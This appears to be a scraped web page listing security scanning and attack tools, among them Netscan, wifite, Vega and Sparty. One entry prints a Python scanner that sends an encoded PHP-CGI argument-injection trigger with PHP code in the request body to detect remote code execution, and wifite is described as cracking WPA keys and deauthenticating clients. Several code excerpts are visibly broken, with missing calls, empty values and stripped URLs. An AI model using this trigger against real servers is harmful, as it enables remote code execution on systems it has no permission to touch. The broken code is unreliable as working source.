Scanners to test security


Climber is an automated auditing tool to check UNIX/Linux systems misconfigurations which may allow local privilege escalation.

python >= 2.7

Climber needs Exscript, a Python module and a template processor for automating network connections over protocols such as Telnet or SSH.

This module is already included in Climber sources.


pMap is a tool for for passively discovering, scanning, and fingerprinting hosts on the local network. Included is a precompiled Windows binary.

Authored by Gregory Pickett | Site
Updated: Feb 4, 2014

Changes: Additional Multicast DNS and SSDP fingerprints. Excludes connected printers from fingerprinting process. Displays any available service configuration.

Reveals open TCP and UDP ports
Uses UDP, mDNS, and SSDP to identify PCs, NAS, Printers, Phones, Tablets, CCTV, DVR, and Others
Device Type, Make, and Model
Operating Systems and Version
Service Versions and Configuration
Stand-Alone (Nmap-like output) or Agent Mode (SYSLOG)
Metasploit Script Included

PHP-CGI Remote Code Execution Scanner

PHP-CGI Remote Code Execution Scanner - This small python script scans for a number of variations on the PHP-CGI remote code execution vulnerability, includes "apache magica" and plesk paths, along with other misconfigurations.

Authored by infodox

# Written for /r/netsec
# test for the apache-magicka exploit bug. Added plesk and "how not to configure your box" paths.
# infodox - - 2013
# Twitter: @info_dox
# Bitcoins: 1PapWy5tKx7xPpX2Zg8Rbmevbk5K4ke1ku
# released under WTFPL
import requests
import sys

def scan(target):
    paths = ['/index.php', '/cgi-bin/php', '/cgi-bin/php5', '/cgi-bin/php-cgi', '/cgi-bin/php.cgi', '/cgi-bin/php4', '/phppath/php', '/phppath/php5', '/local-bin/php', '/local-bin/php5']
    for path in paths:
        probe(target, path)

def probe(target, path):
    print "[*] Testing Path: %s" %(path)
    trigger = path + "/?"
    trigger += "%2D%64+%61%6C%6C%6F%77%5F%75%72%"
    trigger += "6C%5F%69%6E%63%6C%75%64%65%3D%6F"
    trigger += "%6E+%2D%64+%73%61%66%65%5F%6D%6F"
    trigger += "%64%65%3D%6F%66%66+%2D%64+%73%75"
    trigger += "%68%6F%73%69%6E%2E%73%69%6D%75%6"
    trigger += "C%61%74%69%6F%6E%3D%6F%6E+%2D%64"
    trigger += "+%64%69%73%61%62%6C%65%5F%66%75%"
    trigger += "6E%63%74%69%6F%6E%73%3D%22%22+%2"
    trigger += "D%64+%6F%70%65%6E%5F%62%61%73%65"
    trigger += "%64%69%72%3D%6E%6F%6E%65+%2D%64+"
    trigger += "%61%75%74%6F%5F%70%72%65%70%65%6"
    trigger += "E%64%5F%66%69%6C%65%3D%70%68%70%"
    trigger += "3A%2F%2F%69%6E%70%75%74+%2D%6E"
    url = target + trigger
    php = """<?php echo "Content-Type:text/html\r\n\r\n"; echo md5('1337x'); ?>"""
        haxor =, php)
        if "44e902a5aa760d79b76e070fa6725386" in haxor.text:
            print "Exploitable!"
    except Exception:
        print "Err, Someshit broke"

def main(args):
    if len(sys.argv) !=2:

Netscan Port Scanner

Netscan Port Scanner 1.0
Authored by Domenico Pinto
Netscan is a TCP and UDP SYN scanner that can also leverage Tor.

  gcc -lpthread netscan.c -o netscan
  Tcp/Udp/Tor port scanner with: synpacket, connect TCP/UDP and socks5(tor connection)

#include <math.h>
#include <time.h>
#include <stdio.h>
#include <errno.h>
#include <netdb.h>
#include <fcntl.h>
#include <ctype.h>
#include <getopt.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <signal.h>
#include <net/if.h>
#include <pthread.h>
#include <termios.h>
#include <sys/mman.h>
#include <sys/time.h>
#include <sys/wait.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>

#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <netinet/udp.h>
#include <netinet/ip_icmp.h>
#include <netinet/in_systm.h>

#define LPORT       1
#define HPORT       65535    
#define TCPSZ    sizeof(struct iphdr)+sizeof(struct tcphdr)
#define PSESZ       sizeof(struct pseudohdr)+sizeof(struct tcphdr)
#define TORPORT     9050
#define TORCTRL     9051
#define LOCALHOST   ""
#define SOCKS5      "\x05\x01\x00"
#define UDP_RESEND  6
#define UDP_PACKET  4096

/* global var */
static int verbose;
static int syn;
static int conn;
static int tor;
static int normal;
static int progress;
static int rangeport;
static int singleport;
static int specificport;
static int udp;
static int webserver;
static int banserv;

unsigned int delay=50000, timeout=1, timeout_s=1, timeout_u=200;
unsigned short min, max, port;
unsigned short index_p=, index_o=, index_c=, index_f=;
unsigned short ports[HPORT], open_p[HPORT], closed_p[HPORT], filtred_p[HPORT];
char *hostname, *eth0, *ipsource;

typedef enum { false, true } bool;

/* struct tcp syn packet */
struct pseudohdr  {
  in_addr_t src;
    in_addr_t dst;
    char padd;
    char proto;
    unsigned short len;

Nsdtool Netgear Switch Scanner

Nsdtool is a toolset of scripts used to detect Netgear switches in local networks.
The tool contains some extra features like bruteforce and setting a new password.
Netgear has its own protocol called NSDP (Netgear Switch Discovery Protocol), which is implemented to support security tests on the commandline.
It is not being bound to the delivered tools by Netgear.


SystemSearcher is a Linux security scanner written in Perl. It scans single hosts or subnets for anonymous FTP servers, TFTP servers, SMTP servers which allow relaying, SSH servers, Telnet servers, NFS servers with exported directories, mail servers, Web servers (HTTP/HTTPS), well- known trojan ports, and exploitable CGIs. You can also scan a list of specific servers and specific ports. It uses non-blocking socket communication with a 3-second socket timeout. It can also scan for proxy servers which are open to the world (on port 80,8080,1080, or 3128), and SMB servers or Windows boxes sharing directories.


Scuba is a free tool that scans leading enterprise databases for security vulnerabilities and configuration flaws, including patch levels. Reports deliver actionable information to quickly reduce risk, and regular vulnerability updates ensure that Scuba keeps pace with new threats.

Scuba offers nearly 1,200 tests that can be run without experiencing downtime or performance degradation because Scuba does not exploit the vulnerabilities it finds. From configuration flaws such as weak passwords, to known security risks and missing critical patches, Scuba delivers a snapshot analysis of the security posture of your databases and database infrastructure.
Use Scuba to:
Automate vulnerability discovery
Secure infrastructure and measure compliance
Prioritize risk and focus remediation resources
Safely test enterprise class databases

(this tool would be better if there wasn't a "register your email for a download link")


wifite is a tool to attack multiple WEP, WPA, and WPS encrypted networks in a row. This tool is customizable to be automated with only a few arguments. Wifite aims to be the "set it and forget it" wireless auditing tool.

sorts targets by signal strength (in dB); cracks closest access points first
automatically de-authenticates clients of hidden networks to reveal SSIDs
numerous filters to specify exactly what to attack (wep/wpa/both, above certain signal strengths, channels, etc)
customizable settings (timeouts, packets/sec, etc)
"anonymous" feature; changes MAC to a random address before attacking, then changes back when attacks are complete
all captured WPA handshakes are backed up to's current directory
smart WPA de-authentication; cycles between all clients and broadcast deauths
stop any attack with Ctrl+C, with options to continue, move onto next target, skip to cracking, or exit
displays session summary at exit; shows any cracked keys
all passwords saved to cracked.txt
built-in updater: ./ -upgrade

linux operating system (confirmed working on Backtrack 5, BackBox, BlackBuntu, Pentoo, Ubuntu 8.10 (BT4R1), Ubuntu 10.04, Debian 6, Fedora 16)
tested working with python 2.6.x, and python 2.7.x,
wireless drivers patched for monitor mode and injection. Most security distributions (Backtrack, BlackBuntu, etc) come with wireless drivers pre-patched,
aircrack-ng (v1.1) suite

download the latest version:
wget -O

change permissions to executable:
chmod +x


or, to see a list of commands with info:
./ -help

Vega Web Security Scanner

Vega is a free and open source scanner and testing platform to test the security of web applications. Vega can help you find and validate SQL Injection, Cross-Site Scripting (XSS), inadvertently disclosed sensitive information, and other vulnerabilities. It is written in Java, GUI based, and runs on Linux, OS X, and Windows.

Vega includes an automated scanner for quick tests and an intercepting proxy for tactical inspection. The Vega scanner finds XSS (cross-site scripting), SQL injection, and other vulnerabilities. Vega can be extended using a powerful API in the language of the web: Javascript.

Automated Crawler and Vulnerability Scanner
Consistent UI
Website Crawler
Intercepting Proxy
Content Analysis
Extensibility through a Powerful Javascript Module API
Customizable alerts
Database and Shared Data Model

Cross Site Scripting (XSS)
SQL Injection
Directory Traversal
URL Injection
Error Detection
File Uploads
Sensitive Data Discovery


Sparty is an open source tool written in python to audit web applications using sharepoint and frontpage architecture. The motivation behind this tool is to provide an easy and robust way to scrutinize the security configurations of sharepoint and frontpage based web applications. Due to the complex nature of these web administration software, it is required to have a simple and efficient tool that gathers information, check access permissions, dump critical information from default files and perform automated exploitation if security risks are identified. A number of automated scanners fall short of this and Sparty is a solution to that.

# python -h
          _|_|_|    _|_|_|     _|_|    _|_|_|    _|_|_|_|_|  _|      _|  
         _|        _|    _|  _|    _|  _|    _|      _|        _|  _|    
           _|_|    _|_|_|    _|_|_|_|  _|_|_|        _|          _|      
               _|  _|        _|    _|  _|    _|      _|          _|      
         _|_|_|    _|        _|    _|  _|    _|      _|          _|      

        SPARTY : Sharepoint/Frontpage Security Auditing Tool!
        Authored by: Aditya K Sood |{0kn0ck}  | 2013
        Twitter:     @AdityaKSood
        Powered by: IOActive Labs !
Usage: [options]

  --version             show program's version number and exit
  -h, --help            show this help message and exit

    -f FRONTPAGE, --frontpage=FRONTPAGE
                        <FRONTPAGE = pvt | bin> -- to check access permissions
                        on frontpage standard files in vti or bin directory!

    -s SHAREPOINT, --sharepoint=SHAREPOINT

Syndicate content